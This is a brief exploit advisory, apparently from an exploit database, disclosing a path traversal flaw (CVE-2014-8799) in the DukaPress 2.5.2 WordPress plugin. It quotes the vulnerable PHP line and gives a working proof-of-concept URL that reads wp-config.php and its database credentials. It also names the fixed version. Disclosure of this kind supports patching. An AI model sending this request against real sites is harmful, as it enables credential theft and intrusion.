# Exploit Title: DukaPress 2.5.2 Path Traversal # Date: 27-10-2014 # Exploit Author: Kacper Szurek - http://security.szurek.pl # Software Link: https://downloads.wordpress.org/plugin/dukapress.2.5.2.zip # Category: webapps # CVE: CVE-2014-8799 1. Description dp_img_resize() returns $_REQUEST['src'] if $_REQUEST['w'] and $_REQUEST['h'] doesn't exist. File: dukapress\lib\dp_image.php if (!function_exists('add_action')) { require_once('../../../../wp-load.php'); } echo file_get_contents(dp_img_resize('', $_REQUEST['src'],$_REQUEST['w'], $_REQUEST['h'])); http://security.szurek.pl/dukapress-252-path-traversal.html 2. Proof of Concept http://wordpress-url/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php 3. Solution: Update to version 2.5.4 https://downloads.wordpress.org/plugin/dukapress.2.5.4.zip https://plugins.trac.wordpress.org/changeset/1024640/dukapress # Iranian Exploit DataBase = http://IeDb.Ir [2014-11-29]